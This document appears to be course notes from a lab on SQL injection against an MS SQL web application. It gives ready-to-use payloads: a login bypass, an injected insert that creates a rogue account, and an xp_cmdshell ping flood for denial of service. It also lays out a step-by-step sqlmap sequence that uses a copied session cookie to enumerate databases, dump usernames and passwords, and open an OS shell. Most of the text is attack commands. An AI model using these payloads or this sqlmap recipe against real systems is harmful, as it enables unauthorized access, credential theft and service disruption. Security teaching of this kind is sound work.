--- It is basic attack gain unauthorized access to a database or retrive information directly from the database.
--- It is flaw or defect of web application not a database or server issue
--- Understanding when and how web application connects to a database server in order to access data
--- Extracting basic SQL Injection flaws and vulnerabilities
--- Testing web application for Blind SQL Injection vulnerabilities
--- Scanning web servers and analyzing the reports
--- Securing information in web application and web servers
1. SQL Injection Attacks on MS SQL Database
-- Log on Without valid credentials
-- Test for SQL Injection
-- Create your own database
-- Directory lisiting
-- Enforce Denial of Service attacks
---> Open any browser in windows and go to shopping website and go to login
---> We try to login unauthorized user by query and click to login
username = "or""="
password = "or""="
---> Making user without use register option type following query in username feild
blah';insert into login values('mitesh','mitesh123'); --
---> To perform Denial of Service attack type the following query in username feild
blah';exec master..xp_cmdshell'ping [moviewebsite] -l 65000 -t'; --
2. Performing SQL Injection attack against MSSQL to extract Databases and WebShell using SQLMAP
--- Extract the MSSQL Database using SQLMAP
Tool : SQLMAP
---> Log in the application and note down the URL in the address bar
---> Copy the cookie with inspect element in console and search below document.cookie
---> Open a terminal and type a command
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" --dbs --- This query enumerate the database information [Y Y N]
---> We found a database now find a tables in database
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -D [database name] --tables
---> Intresting table found then find out columns
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -D [database name] -T [table name] --columns
---> Now we are dump all the table content
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -D [database name] -T [table name] --dump
---> We have getting a Username and Password
---> Gain the access of OS Shell machine
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -- os-shell (Y)
